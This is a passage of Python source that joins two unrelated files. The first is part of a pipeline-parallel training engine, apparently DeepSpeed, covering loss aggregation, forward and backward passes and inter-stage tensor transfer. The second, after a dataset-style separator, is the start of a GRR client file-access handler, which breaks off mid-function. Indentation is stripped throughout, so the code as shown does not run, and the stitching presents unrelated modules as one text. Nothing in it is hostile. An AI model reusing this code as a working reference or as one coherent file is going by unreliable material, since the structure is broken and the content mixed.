if self.tensorboard_enabled():
if self.global_rank == 0:
self.summary_events = [(f'Train/Samples/eval_loss',
self.agg_eval_loss.mean().item(),
self.global_samples)]
for event in self.summary_events: # write_summary_events
self.summary_writer.add_scalar(event[0], event[1], event[2])
self.summary_writer.flush()
# Restore the training iterator
self.set_dataiterator(train_iterator)
# Reset any buffers that may have been populated during the forward passes.
#ds_checkpointing.reset()
return self.agg_eval_loss
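# Sketch of the matching evaluation call (same assumptions as the train_batch example
# above); eval_batch() wraps the schedule in torch.no_grad() itself, so no explicit
# context manager is needed:
#
#   val_loss = engine.eval_batch(data_iter=iter(val_loader))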
def is_first_stage(self):
"""True if this process is in the first stage in the pipeline."""
return self.stage_id == 0
def is_last_stage(self):
"""True if this process is in the last stage in the pipeline."""
return self.stage_id == self.num_stages - 1
def _aggregate_total_loss(self):
# Scale loss, average among DP ranks, and bcast loss to the rest of my DP group
if self.is_last_stage():
loss = self._scale_loss(self.total_loss)
self.dp_group_loss = loss.clone().detach()
## Average loss across all data-parallel groups
agg_loss = self.dp_group_loss.clone().detach()
#print(f'RANK={self.global_rank} bcast SENDER src={self.global_rank} group={self.grid.pp_group}', flush=True)
if self.is_data_parallel:
dist.all_reduce(agg_loss, group=self.mpu.get_data_parallel_group())
agg_loss /= self.dp_world_size
assert self.global_rank in self.grid.pp_group
losses = torch.Tensor([self.dp_group_loss, agg_loss]).to(self.device)
dist.broadcast(tensor=losses,
src=self.global_rank,
group=self.mpu.get_pipe_parallel_group())
else:
# Get loss from last stage
src_rank = self.grid.stage_to_global(self.num_stages - 1)
assert src_rank in self.grid.pp_group
losses = torch.Tensor([0., 0.]).to(self.device)
dist.broadcast(tensor=losses,
src=src_rank,
group=self.grid.get_pipe_parallel_group())
self.dp_group_loss = losses[0].clone().detach()
agg_loss = losses[1].clone().detach()
return agg_loss
def set_dataloader(self, loader):
""""""
if self.is_first_stage() or self.is_last_stage():
self.training_dataloader = loader
self.data_iterator = iter(self.training_dataloader)
def set_dataiterator(self, iterator):
""" Store an iterator to sample for training data. """
if self.is_first_stage() or self.is_last_stage():
self.training_dataloader = None
self.data_iterator = iterator
def set_batch_fn(self, fn):
self.batch_fn = fn
def is_gradient_accumulation_boundary(self):
"""True if the engine is executing a gradient reduction or optimizer step instruction.
This is overridden from :class:`DeepSpeedEngine` to force reductions
and steps when the pipeline engine is instructed to do so.
Returns:
bool: whether reductions and optimizer steps should occur.
"""
return self._force_grad_boundary
def log_for_device(self, *msg):
if LOG_STAGE == self.stage_id or LOG_STAGE == -1:
if DATA_PARALLEL_ID == self.grid.data_parallel_id or DATA_PARALLEL_ID == -1:
print(
f'RANK={dist.get_rank()} '
f'PIPE-ID={self.stage_id} '
f'DATA-ID={self.grid.data_parallel_id} '
f'MBATCH-ID={self.microbatch_id} '
f'STEP-ID={self.log_batch_step_id} '
'::',
*msg,
flush=True)
def tput_log(self, *msg):
if self.global_rank == 0 and self.global_steps % self.steps_per_print() == 0:
print(*msg)
def _next_batch(self):
if self.is_model_parallel:
mp_rank = self.grid.get_slice_parallel_rank()
else:
mp_rank = 0
batch = None
# Only MP rank 0 loads the data.
if mp_rank == 0:
if self.data_iterator is None:
raise ValueError(f"RANK={self.global_rank} no data iterator provided.")
batch = next(self.data_iterator)
# All MP ranks participate in batch_fn, where they might broadcast the data.
if self.batch_fn:
batch = self.batch_fn(batch)
return batch
def _exec_forward_pass(self, buffer_id):
self.tput_timer.start()
self.mem_status('BEFORE FWD', reset_max=True)
if isinstance(self.pipe_buffers['inputs'][buffer_id], tuple):
inputs = tuple(t.clone() for t in self.pipe_buffers['inputs'][buffer_id])
else:
inputs = self.pipe_buffers['inputs'][buffer_id].clone()
# collect the partitioned input from the previous stage
if self.is_pipe_partitioned and not self.is_first_stage():
part_input = PartitionedTensor.from_meta(
meta=inputs[0],
local_part=inputs[1],
group=self.grid.get_slice_parallel_group())
inputs = tuple([part_input.full(), inputs[2]])
inputs[0].requires_grad = True
# skip mask
#inputs[1].requires_grad = True
part_input = None
self.pipe_buffers['inputs'][buffer_id] = inputs
# Zero out the gradients each time we use the tensor because only the data in
# the tensor changes across batches.
self._zero_grads(inputs)
outputs = super().forward(inputs)
# Partition the outputs if we are not the last stage
if self.is_pipe_partitioned and not self.is_last_stage():
part = PartitionedTensor(tensor=outputs[0],
group=self.grid.get_slice_parallel_group())
# Clear the large output data, but save the computation graph
outputs[0].data = torch.zeros(1)
self.pipe_buffers['output_tensors'][buffer_id] = outputs[0]
# Inject the partitioned tensor into the output before sending
outputs = tuple([part.to_meta(), part.data(), outputs[1]])
part = None
self.pipe_buffers['outputs'][buffer_id] = outputs
# Optionally compute loss on the last device
if self.is_last_stage():
if self.loss_model is not None:
labels = self.pipe_buffers['labels'][buffer_id]
self.loss = self.loss_model(outputs, labels)
else:
# Some models just return loss from forward()
self.loss = outputs
if isinstance(self.loss, torch.Tensor):
if self.total_loss is None:
self.total_loss = torch.zeros_like(self.loss)
self.total_loss += self.loss.detach()
else:
if self.total_loss is None:
self.total_loss = [torch.zeros_like(l) for l in self.loss]
for idx, l in enumerate(self.loss):
self.total_loss[idx] += l.detach()
def _exec_backward_pass(self, buffer_id):
assert self.optimizer is not None, "must provide optimizer during " \
"init in order to use backward"
self.mem_status('BEFORE BWD', reset_max=True)
# The last stage just runs backward on the loss using DeepSpeed's typical
# mechanisms.
if self.is_last_stage():
super().backward(self.loss)
self.mem_status('AFTER BWD')
return
outputs = self.pipe_buffers['outputs'][buffer_id]
if self.wall_clock_breakdown():
self.timers('backward_microstep').start()
self.timers('backward').start()
self.timers('backward_inner_microstep').start()
self.timers('backward_inner').start()
# Reconstruct if we previously partitioned the output. We must be
# careful to also restore the computational graph of the tensors we partitioned.
if self.is_pipe_partitioned:
if self.is_grad_partitioned:
part_output = PartitionedTensor.from_meta(
meta=outputs[0],
local_part=outputs[1],
group=self.grid.get_slice_parallel_group())
self.pipe_buffers['output_tensors'][buffer_id].data = part_output.full()
outputs = tuple(
[self.pipe_buffers['output_tensors'][buffer_id],
outputs[2]])
else:
# Already restored from partition
self.pipe_buffers['output_tensors'][buffer_id].data = outputs[0]
outputs = tuple(
[self.pipe_buffers['output_tensors'][buffer_id],
outputs[1]])
grad_tensors = self.grad_layer
if self.is_grad_partitioned:
#print(f'RANK={self.global_rank} BEFORE-BWD restoring grad={self.grad_layer[0].size()} {self.grad_layer[1].size()}')
part_grad = PartitionedTensor.from_meta(
meta=self.grad_layer[0],
local_part=self.grad_layer[1],
group=self.grid.get_slice_parallel_group())
grad_tensors = tuple([part_grad.full(), self.grad_layer[2]])
part_grad = None
#print(f'RANK={self.global_rank} BEFORE-BWD restored grad={self.grad_layer[0].size()} {self.grad_layer[1].size()}')
# This handles either a single tensor or tuple of tensors.
if isinstance(outputs, tuple):
out_tensors = [t for t in outputs if t.is_floating_point()]
assert len(out_tensors) == len(grad_tensors)
torch.autograd.backward(tensors=out_tensors, grad_tensors=grad_tensors)
else:
torch.autograd.backward(tensors=(outputs, ), grad_tensors=(grad_tensors, ))
# Free up the memory from the output of forward()
self.pipe_buffers['output_tensors'][buffer_id] = None
self.pipe_buffers['outputs'][buffer_id] = None
grad_tensors = None
if self.wall_clock_breakdown():
self.timers('backward_inner').stop()
self.timers('backward_inner_microstep').stop()
self.timers('backward').stop()
self.timers('backward_microstep').stop()
self.mem_status('AFTER BWD')
def _exec_load_micro_batch(self, buffer_id):
if self.wall_clock_breakdown():
self.timers('batch_input').start()
batch = self._next_batch()
if self.is_first_stage():
loaded = None
if torch.is_tensor(batch[0]):
loaded = batch[0].clone().to(self.device).detach()
loaded.requires_grad = loaded.is_floating_point()
else:
assert isinstance(batch[0], tuple)
# Assume list or tuple
loaded = []
for x in batch[0]:
assert torch.is_tensor(x)
mine = x.clone().detach().to(self.device)
mine.requires_grad = mine.is_floating_point()
loaded.append(mine)
loaded = tuple(loaded)
self.pipe_buffers['inputs'][buffer_id] = loaded
if self.is_last_stage():
loaded = batch[1]
if torch.is_tensor(batch[1]):
loaded = batch[1].to(self.device)
elif isinstance(batch[1], tuple):
loaded = []
for x in batch[1]:
assert torch.is_tensor(x)
x = x.to(self.device).detach()
loaded.append(x)
loaded = tuple(loaded)
self.pipe_buffers['labels'][buffer_id] = loaded
if self.wall_clock_breakdown():
self.timers('batch_input').stop()
def _send_tensor_meta(self, buffer, recv_stage):
""" Communicate metadata about upcoming p2p transfers.
Metadata is communicated in this order:
* type (0: tensor, 1: list, 2: tuple)
* num_tensors if type is list or tuple
foreach tensor in buffer:
* ndims
* shape
"""
send_bytes = 0
if isinstance(buffer, torch.Tensor):
type_tensor = torch.LongTensor(data=[0]).to(self.device)
p2p.send(type_tensor, recv_stage)
send_shape = torch.LongTensor(data=buffer.size()).to(self.device)
send_ndims = torch.LongTensor(data=[len(buffer.size())]).to(self.device)
p2p.send(send_ndims, recv_stage)
p2p.send(send_shape, recv_stage)
send_bytes += _tensor_bytes(buffer)
elif isinstance(buffer, list):
assert (False)
type_tensor = torch.LongTensor(data=[1]).to(self.device)
p2p.send(type_tensor, recv_stage)
count_tensor = torch.LongTensor(data=[len(buffer)]).to(self.device)
p2p.send(count_tensor, recv_stage)
for tensor in buffer:
assert isinstance(tensor, torch.Tensor)
send_shape = torch.LongTensor(data=tensor.size()).to(self.device)
send_ndims = torch.LongTensor(data=[len(tensor.size())]).to(self.device)
p2p.send(send_ndims, recv_stage)
p2p.send(send_shape, recv_stage)
send_bytes += _tensor_bytes(tensor)
elif isinstance(buffer, tuple):
type_tensor = torch.LongTensor(data=[2]).to(self.device)
p2p.send(type_tensor, recv_stage)
count_tensor = torch.LongTensor(data=[len(buffer)]).to(self.device)
p2p.send(count_tensor, recv_stage)
for idx, tensor in enumerate(buffer):
assert isinstance(tensor, torch.Tensor)
send_shape = torch.LongTensor(data=tensor.size()).to(self.device)
send_ndims = torch.LongTensor(data=[len(tensor.size())]).to(self.device)
p2p.send(send_ndims, recv_stage)
p2p.send(send_shape, recv_stage)
# Useful for performance debugging.
'''
new_bytes = _tensor_bytes(tensor)
send_bytes += _tensor_bytes(tensor)
# Useful for performance debugging.
if self.grid.data_parallel_id == 0:
print(
f'STAGE={self.stage_id} pipe-send-volume[{idx}]: shape={send_shape} {new_bytes/1024**2:0.2f}MB'
)
'''
else:
raise NotImplementedError(f'Could not send meta type {type(buffer)}')
# Useful for performance debugging.
'''
if self.grid.data_parallel_id == 0:
print(f'STAGE={self.stage_id} pipe-send-volume: {send_bytes/1024**2:0.2f}MB')
'''
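# Illustration of the metadata stream produced above for a tuple of two tensors with
# shapes (8, 1024) and (8,): type=[2], count=[2], ndims=[2], shape=[8, 1024],
# ndims=[1], shape=[8] -- each bracketed value is one p2p.send of a LongTensor,
# matching the receive order in _recv_tensor_meta() below.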
def _recv_tensor_meta(self, send_stage):
"""Receive metadata about upcoming p2p transfers and return allocated buffers.
Metadata is communicated in this order:
* type (0: tensor, 1: list, 2: tuple)
* num_tensors if type is list or tuple
foreach tensor in buffer:
* ndims
* shape
Returns:
Allocated buffer for receiving from send_stage.
"""
type_tensor = torch.LongTensor(data=[0]).to(self.device)
p2p.recv(type_tensor, send_stage)
recv_type = type_tensor.item()
# A single tensor will be sent.
if recv_type == 0:
recv_ndims = torch.LongTensor(data=[0]).to(self.device)
p2p.recv(recv_ndims, send_stage)
recv_ndims = recv_ndims.item()
recv_shape = torch.LongTensor([1] * recv_ndims).to(self.device)
p2p.recv(recv_shape, send_stage)
recv_shape = recv_shape.tolist()
return self._allocate_buffer(recv_shape, num_buffers=1)[0]
# List or tuple of tensors
elif recv_type == 1 or recv_type == 2:
count_tensor = torch.LongTensor(data=[0]).to(self.device)
p2p.recv(count_tensor, send_stage)
num_tensors = count_tensor.item()
recv_shapes = []
for idx in range(num_tensors):
recv_ndims = torch.LongTensor(data=[0]).to(self.device)
p2p.recv(recv_ndims, send_stage)
recv_ndims = recv_ndims.item()
recv_shape = torch.LongTensor([1] * recv_ndims).to(self.device)
p2p.recv(recv_shape, send_stage)
recv_shapes.append(recv_shape.tolist())
buffers = self._allocate_buffers(recv_shapes, num_buffers=1)[0]
# Convert to tuples if requested.
if recv_type == 2:
buffers = tuple(buffers)
return buffers
else:
raise NotImplementedError(f'Could not receive type {recv_type}')
def _exec_send_activations(self, buffer_id):
if self.wall_clock_breakdown():
self.timers('pipe_send_output').start()
outputs = self.pipe_buffers['outputs'][buffer_id]
# NCCL does not like to send torch.BoolTensor types, so cast the mask to half().
# We could do char, but with half() we can eventually flatten with other fp16
# messages (TODO)
if self.module.__class__.__name__ == 'GPT2ModelPipe':
outputs = list(outputs)
outputs[-1] = outputs[-1].half()
outputs = tuple(outputs)
if self.first_output_send:
self.first_output_send = False
self._send_tensor_meta(outputs, self.next_stage)
if isinstance(outputs, torch.Tensor):
p2p.send(outputs, self.next_stage)
elif isinstance(outputs, tuple):
for idx, buffer in enumerate(outputs):
p2p.send(buffer, self.next_stage)
else:
raise NotImplementedError('Could not send output of type '
f'{type(outputs)}')
# Restore the boolean tensor
if self.module.__class__.__name__ == 'GPT2ModelPipe':
outputs = list(outputs)
outputs[-1] = outputs[-1].bool()
outputs = tuple(outputs)
if self.wall_clock_breakdown():
self.timers('pipe_send_output').stop()
def _exec_send_grads(self, buffer_id):
if self.wall_clock_breakdown():
self.timers('pipe_send_grad').start()
inputs = self.pipe_buffers['inputs'][buffer_id]
# Partition the gradient
if self.is_grad_partitioned:
part = PartitionedTensor(tensor=inputs[0].grad,
group=self.grid.get_slice_parallel_group())
# Clear the large output data, but save the computation graph
# Inject the partitioned tensor into the output before sending
# XXX Hack
inputs = tuple([part.to_meta(), part.data(), inputs[1]])
# XXX Terrible hack
# Drop the attention mask from the input buffer here. It does not have
# a grad that needs to be communicated. We free the buffer immediately
# after, so no need to restore it. The receiver also has a hack that skips
# the recv. This is because NCCL does not let us send torch.BoolTensor :-(.
if self.module.__class__.__name__ == 'GPT2ModelPipe':
inputs = list(inputs)
inputs.pop()
inputs = tuple(inputs)
if isinstance(inputs, torch.Tensor):
assert inputs.grad is not None
p2p.send(inputs.grad, self.prev_stage)
else:
# XXX terrible hacky branch
if self.is_grad_partitioned:
# First two sends are partitioned gradient
p2p.send(inputs[0], self.prev_stage)
p2p.send(inputs[1], self.prev_stage)
# XXX hack hack hack
#p2p.send(inputs[2].grad, self.prev_stage)
else:
for idx, buffer in enumerate(inputs):
# Skip tensors that will not produce a grad
if not buffer.is_floating_point():
assert buffer.grad is None
continue
assert buffer.grad is not None
p2p.send(buffer.grad, self.prev_stage)
# We can free up the input buffer now
self.pipe_buffers['inputs'][buffer_id] = None
if self.wall_clock_breakdown():
self.timers('pipe_send_grad').stop()
def _exec_recv_activations(self, buffer_id):
if self.wall_clock_breakdown():
self.timers('pipe_recv_input').start()
recvd = None
# Allocate the buffer if necessary
if self.pipe_recv_buf is None:
self.pipe_recv_buf = self._recv_tensor_meta(self.prev_stage)
if isinstance(self.pipe_recv_buf, torch.Tensor):
p2p.recv(self.pipe_recv_buf, self.prev_stage)
recvd = self.pipe_recv_buf.clone().detach()
recvd.requires_grad = recvd.is_floating_point()
else:
assert isinstance(self.pipe_recv_buf, tuple)
recvd = [None] * len(self.pipe_recv_buf)
for idx, buffer in enumerate(self.pipe_recv_buf):
assert torch.is_tensor(buffer)
# XXX hardcode meta type
if self.is_pipe_partitioned and idx == 0 and buffer.dtype != torch.long:
if self.meta_buffer is None:
self.meta_buffer = torch.zeros(buffer.size(),
dtype=torch.long,
device=self.device)
buffer = self.meta_buffer
p2p.recv(buffer, self.prev_stage)
recvd[idx] = buffer.clone().detach()
# NCCL does not like to send torch.BoolTensor types, so un-cast the
# attention mask
if self.module.__class__.__name__ == 'GPT2ModelPipe':
recvd[-1] = recvd[-1].bool()
recvd = tuple(recvd)
for buffer in recvd:
buffer.requires_grad = buffer.is_floating_point()
self.pipe_buffers['inputs'][buffer_id] = recvd
if self.wall_clock_breakdown():
self.timers('pipe_recv_input').stop()
def _exec_recv_grads(self, buffer_id):
if self.wall_clock_breakdown():
self.timers('pipe_recv_grad').start()
outputs = self.pipe_buffers['outputs'][buffer_id]
# XXX these shapes are hardcoded for Megatron
# Restore partitioned output if it was partitioned and we are sending full gradients
if self.is_pipe_partitioned and not self.is_grad_partitioned:
part_output = PartitionedTensor.from_meta(
meta=outputs[0],
local_part=outputs[1],
group=self.grid.get_slice_parallel_group())
outputs[0].data = part_output.full()
outputs = tuple([outputs[0], outputs[2]])
# save for backward
self.pipe_buffers['outputs'][buffer_id] = outputs
# Allocate gradient if necessary
if self.grad_layer is None:
if isinstance(outputs, torch.Tensor):
s = list(outputs.size())
self.grad_layer = self._allocate_buffer(s, num_buffers=1)[0]
else:
sizes = [list(t.size()) for t in outputs if t.is_floating_point()]
self.grad_layer = self._allocate_buffers(sizes, num_buffers=1)[0]
if isinstance(self.grad_layer, torch.Tensor):
p2p.recv(self.grad_layer, self.next_stage)
else:
assert isinstance(outputs, tuple)
for idx, buffer in enumerate(self.grad_layer):
# XXX GPT-2 hack
if self.is_grad_partitioned and idx == 0 and buffer.dtype != torch.long:
buffer.data = torch.zeros(buffer.size(),
dtype=torch.long,
device=self.device)
p2p.recv(buffer, self.next_stage)
if self.wall_clock_breakdown():
self.timers('pipe_recv_grad').stop()
def _exec_optimizer_step(self, lr_kwargs=None):
if self.wall_clock_breakdown():
self.timers('step_microstep').start()
self.timers('step').start()
self.mem_status('BEFORE STEP', reset_max=True)
self._force_grad_boundary = True
self._take_model_step(lr_kwargs)
self._force_grad_boundary = False
self.mem_status('AFTER STEP')
if self.tensorboard_enabled():
if self.global_rank == 0:
self.summary_events = [(f'Train/Samples/lr',
self.get_lr()[0],
self.global_samples)]
if self.fp16_enabled() and hasattr(self.optimizer, 'cur_scale'):
self.summary_events.append((f'Train/Samples/loss_scale',
self.optimizer.cur_scale,
self.global_samples))
for event in self.summary_events: # write_summary_events
self.summary_writer.add_scalar(event[0], event[1], event[2])
if self.wall_clock_breakdown():
self.timers('step_microstep').stop()
self.timers('step').stop()
if self.global_steps % self.steps_per_print() == 0:
self.timers.log([
'batch_input',
'forward_microstep',
'backward_microstep',
'backward_inner_microstep',
'backward_allreduce_microstep',
'backward_tied_allreduce_microstep',
'step_microstep'
])
if self.global_steps % self.steps_per_print() == 0:
self.timers.log([
'forward',
'backward',
'backward_inner',
'backward_allreduce',
'step'
])
def _zero_grads(self, inputs):
if isinstance(inputs, torch.Tensor):
if inputs.grad is not None:
inputs.grad.data.zero_()
else:
for t in inputs:
if t.grad is not None:
t.grad.data.zero_()
def _allocate_zeros(self, shape, fp16=None, **kwargs):
""" Allocate a tensor of zeros on the engine's device.
Arguments:
shape: the shape of the tensor to allocate
fp16 (bool): whether to use FP16. default: defer to self.fp16_enabled()
kwargs: passed to torch.zeros()
Returns:
A tensor from torch.zeros() allocated on self.device.
"""
if fp16 is None:
fp16 = self.fp16_enabled()
if fp16:
return torch.zeros(shape, dtype=torch.half, device=self.device, **kwargs)
else:
return torch.zeros(shape, device=self.device, **kwargs)
def _allocate_buffer(self, shape, num_buffers=-1, **kwargs):
buffers = []
if num_buffers == -1:
num_buffers = self.num_pipe_buffers
for count in range(num_buffers):
buffers.append(self._allocate_zeros(shape, **kwargs))
return buffers
def _allocate_buffers(self, shapes, requires_grad=False, num_buffers=-1):
buffers = []
if num_buffers == -1:
num_buffers = self.num_pipe_buffers
for count in range(num_buffers):
buffer = []
for shape in shapes:
buffer.append(self._allocate_zeros(shape, requires_grad=requires_grad))
buffers.append(buffer)
return buffers
def forward(self, *args, **kwargs):
"""Disabled for pipeline parallel training. See ``train_batch()``. """
raise PipelineError("Only train_batch() is accessible in pipeline mode.")
def backward(self, *args, **kwargs):
"""Disabled for pipeline parallel training. See ``train_batch()``. """
raise PipelineError("Only train_batch() is accessible in pipeline mode.")
def step(self, *args, **kwargs):
"""Disabled for pipeline parallel training. See ``train_batch()``. """
raise PipelineError("Only train_batch() is accessible in pipeline mode.")
def mem_status(self, msg, print_rank=-1, reset_max=False):
return
global mem_alloced, mem_cached
if not self.global_steps == 0 or not self.global_steps == 9:
#return
pass
if self.mpu.get_data_parallel_rank() != 0:
return
if self.global_rank != 0:
return
rank = self.global_rank
if print_rank != -1 and rank != print_rank:
return
torch.cuda.synchronize()
if reset_max:
torch.cuda.reset_max_memory_cached()
torch.cuda.reset_max_memory_allocated()
new_alloced = torch.cuda.memory_allocated()
new_cached = torch.cuda.memory_cached()
delta_alloced = new_alloced - mem_alloced
delta_cached = new_cached - mem_cached
mem_cached = new_cached
mem_alloced = new_alloced
max_alloced = torch.cuda.max_memory_allocated()
max_cached = torch.cuda.max_memory_cached()
# convert to GB for printing
new_alloced /= 1024**3
new_cached /= 1024**3
delta_alloced /= 1024**3
delta_cached /= 1024**3
max_alloced /= 1024**3
max_cached /= 1024**3
print(
f'RANK={rank} STAGE={self.stage_id} STEP={self.global_steps} MEMSTATS',
msg,
f'current alloc={new_alloced:0.4f}GB (delta={delta_alloced:0.4f}GB max={max_alloced:0.4f}GB) '
f'current cache={new_cached:0.4f}GB (delta={delta_cached:0.4f}GB max={max_cached:0.4f}GB)'
)
def module_state_dict(self):
"""Override hack to save a pipe model and return the directory path of the save.
This method should only be called by DeepSpeed's ``save_checkpoint()``. The
recommended way of saving a ``PipelineModule`` outside of ``save_checkpoint()``
is ``save_state_dict()``.
Returns:
None
"""
assert isinstance(self.module, PipelineModule)
assert self._curr_ckpt_path is not None, \
"PipelineEngine expects module_state_dict() to be called from save_checkpoint()"
self.module.save_state_dict(self._curr_ckpt_path)
return None
def load_module_state_dict(self, state_dict, strict=True):
"""Override hack to instead use a directory path.
This is important because pipeline models checkpoint by layer instead of rank.
If ``state_dict`` is neither ``None`` nor a ``str``, we fall back to ``super()``, which expects a ``dict``.
Args:
state_dict (str, None): unused
strict (bool, optional): Strict state loading. Defaults to True.
"""
if (state_dict is not None) and (not isinstance(state_dict, str)):
super().load_module_state_dict(state_dict, strict)
return
self.module.load_state_dir(load_dir=self._curr_ckpt_path, strict=strict)
# A map of PipeInstruction types to methods. Each method will be executed with the
# kwargs provided to the PipeInstruction from the scheduler.
_INSTRUCTION_MAP = {
schedule.OptimizerStep: _exec_optimizer_step,
schedule.ReduceGrads: _exec_reduce_grads,
schedule.ReduceTiedGrads: _exec_reduce_tied_grads,
schedule.LoadMicroBatch: _exec_load_micro_batch,
schedule.ForwardPass: _exec_forward_pass,
schedule.BackwardPass: _exec_backward_pass,
schedule.SendActivation: _exec_send_activations,
schedule.RecvActivation: _exec_recv_activations,
schedule.SendGrad: _exec_send_grads,
schedule.RecvGrad: _exec_recv_grads,
}
def _exec_schedule(self, pipe_schedule):
self._reserve_pipe_buffers(pipe_schedule.num_pipe_buffers())
# For each step in the schedule
for step_cmds in pipe_schedule:
# For each instruction in the step
for cmd in step_cmds:
if type(cmd) not in self._INSTRUCTION_MAP:
raise RuntimeError(
f'{self.__class__.__name__} does not understand instruction {repr(cmd)}'
)
# Equivalent to: self._exec_forward_pass(buffer_id=0)
self._exec_instr = MethodType(self._INSTRUCTION_MAP[type(cmd)], self)
self._exec_instr(**cmd.kwargs)
def set_batch_fn(self, fn):
"""Execute a post-processing function on input data.
Args:
fn (function): The function to run.
"""
self.batch_fn = fn
|
the-stack_0_6506 | #!/usr/bin/env python
"""Implements VFSHandlers for files on the client."""
from __future__ import unicode_literals
import logging
import os
import platform
import re
import sys
import threading
from grr_response_client import client_utils
from grr_response_client import vfs
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import paths as rdf_paths
# File handles are cached here. They expire after a couple minutes so
# we don't keep files locked on the client.
FILE_HANDLE_CACHE = utils.TimeBasedCache(max_age=300)
class LockedFileHandle(object):
"""An object which encapsulates access to a file."""
def __init__(self, filename, mode="rb"):
self.lock = threading.RLock()
self.fd = open(filename, mode)
self.filename = filename
def Seek(self, offset, whence=0):
self.fd.seek(offset, whence)
def Read(self, length):
return self.fd.read(length)
def Tell(self):
return self.fd.tell()
def Close(self):
with self.lock:
self.fd.close()
class FileHandleManager(object):
"""An exclusive accesssor for a filehandle."""
def __init__(self, filename):
self.filename = filename
def __enter__(self):
try:
self.fd = FILE_HANDLE_CACHE.Get(self.filename)
except KeyError:
self.fd = LockedFileHandle(self.filename, mode="rb")
FILE_HANDLE_CACHE.Put(self.filename, self.fd)
# Wait for exclusive access to this file handle.
self.fd.lock.acquire()
return self.fd
def __exit__(self, exc_type=None, exc_val=None, exc_tb=None):
self.fd.lock.release()
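# Typical usage sketch: `with FileHandleManager(filename) as fd: fd.Seek(0); data = fd.Read(n)`.
# The context manager serializes access through the handle's RLock, and FILE_HANDLE_CACHE
# keeps the underlying descriptor open for up to 300 seconds (max_age above).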
class File(vfs.VFSHandler):
"""Read a regular file."""
supported_pathtype = rdf_paths.PathSpec.PathType.OS
auto_register = True
files = None
# Directories do not have a size.
size = None
# On windows reading devices must have an alignment.
alignment = 1
file_offset = 0
def __init__(self,
base_fd,
pathspec=None,
progress_callback=None,
full_pathspec=None):
super(File, self).__init__(
base_fd,
pathspec=pathspec,
full_pathspec=full_pathspec,
progress_callback=progress_callback)
if base_fd is None:
self.pathspec.Append(pathspec)
# We can stack on another directory, which means we concatenate their
# directory with ours.
elif base_fd.IsDirectory():
self.pathspec.last.path = utils.JoinPath(self.pathspec.last.path,
pathspec.path)
else:
raise IOError("File handler can not be stacked on another handler.")
self.path = self.pathspec.last.path
# We can optionally apply a global offset to the file.
if self.pathspec[0].HasField("offset"):
self.file_offset = self.pathspec[0].offset
self.pathspec.last.path_options = rdf_paths.PathSpec.Options.CASE_LITERAL
self.FileHacks()
self.filename = client_utils.CanonicalPathToLocalPath(self.path)
error = None
# Pythonic way - duck typing. Is the handle a directory?
try:
if not self.files:
# Note that the encoding of local path is system specific
local_path = client_utils.CanonicalPathToLocalPath(self.path + "/")
self.files = [
utils.SmartUnicode(entry) for entry in os.listdir(local_path)
]
# Some filesystems do not support unicode properly
except UnicodeEncodeError as e:
raise IOError(str(e))
except (IOError, OSError) as e:
self.files = []
error = e
# Ok, it's not. Is it a file then?
try:
with FileHandleManager(self.filename) as fd:
if pathspec.last.HasField("file_size_override"):
self.size = pathspec.last.file_size_override - self.file_offset
else:
# Work out how large the file is.
if self.size is None:
fd.Seek(0, 2)
end = fd.Tell()
if end == 0:
# This file is not seekable, we just use the default.
end = pathspec.last.file_size_override
self.size = end - self.file_offset
error = None
# Some filesystems do not support unicode properly
except UnicodeEncodeError as e:
raise IOError(str(e))
except IOError as e:
if error:
error = e
if error is not None:
raise error # pylint: disable=raising-bad-type
def FileHacks(self):
"""Hacks to make the filesystem look normal."""
if sys.platform == "win32":
import win32api # pylint: disable=g-import-not-at-top
# Make the filesystem look like the topmost level are the drive letters.
if self.path == "/":
self.files = win32api.GetLogicalDriveStrings().split("\x00")
# Remove empty strings and strip trailing backslashes.
self.files = [drive.rstrip("\\") for drive in self.files if drive]
# This regex will match the various windows devices. Raw hard disk devices
# must be considered files, however in windows, if we try to list them as
# directories this also works. Since the code above distinguished between
# files and directories using the file listing property, we must force
# treating raw devices as files.
elif re.match(r"/*\\\\.\\[^\\]+\\?$", self.path) is not None:
# Special case: windows devices can't seek to the end, so just lie about
# the size.
self.size = 0x7fffffffffffffff
# Windows raw devices can be opened in two incompatible modes. With a
# trailing \ they look like a directory, but without they are the raw
# device. In GRR we only support opening devices in raw mode so ensure
# that we never append a \ to raw device name.
self.path = self.path.rstrip("\\")
# In windows raw devices must be accessed using sector alignment.
self.alignment = 512
elif sys.platform == "darwin":
# On Mac, raw disk devices are also not seekable to the end and have no
# size so we use the same approach as on Windows.
if re.match("/dev/r?disk.*", self.path):
self.size = 0x7fffffffffffffff
self.alignment = 512
def _GetDepth(self, path):
if path[0] != os.path.sep:
raise RuntimeError("Relative paths aren't supported.")
return len(re.findall(r"%s+[^%s]+" % (os.path.sep, os.path.sep), path))
def _GetDevice(self, path):
try:
return utils.Stat(path).GetDevice()
except (IOError, OSError) as error:
logging.error("Failed to obtain device for '%s' (%s)", path, error)
return None
def RecursiveListNames(self, depth=0, cross_devs=False):
path = client_utils.CanonicalPathToLocalPath(self.path)
path_depth = self._GetDepth(self.path)
if not cross_devs:
path_dev = self._GetDevice(path)
for root, dirs, files in os.walk(self.path):
dirs.sort()
files.sort()
root_depth = self._GetDepth(root)
# The recursion of the `os.walk` procedure is guided by the `dirs`
# variable [1]. By clearing `dirs` below we force the generator to omit
# certain paths.
#
# [1]: https://docs.python.org/2/library/os.html#os.walk
if not cross_devs and self._GetDevice(root) != path_dev:
dirs[:] = [] # We don't need to go deeper (clear the list)
elif root_depth - path_depth >= depth:
yield (root, dirs[:], files) # Shallow copy
dirs[:] = []
else:
yield (root, dirs, files)
def ListNames(self):
return self.files or []
def Read(self, length=None):
"""Read from the file."""
if self.progress_callback:
self.progress_callback()
available_to_read = max(0, (self.size or 0) - self.offset)
if length is None:
to_read = available_to_read
else:
to_read = min(length, available_to_read)
with FileHandleManager(self.filename) as fd:
offset = self.file_offset + self.offset
pre_padding = offset % self.alignment
# Due to alignment we read some more data than we need to.
aligned_offset = offset - pre_padding
fd.Seek(aligned_offset)
data = fd.Read(to_read + pre_padding)
self.offset += len(data) - pre_padding
return data[pre_padding:]
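# Worked example of the alignment handling above: with alignment=512 (a raw Windows
# device) and an effective offset of 700, pre_padding = 700 % 512 = 188 and
# aligned_offset = 512, so 188 extra bytes are read and then sliced off before the
# data is returned to the caller.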
def Stat(self, path=None, ext_attrs=False):
"""Returns stat information of a specific path.
Args:
path: a Unicode string containing the path or None.
If path is None the value in self.path is used.
ext_attrs: Whether the call should also collect extended attributes.
Returns:
a StatResponse proto
Raises:
IOError when call to os.stat() fails
"""
# Note that the encoding of local path is system specific
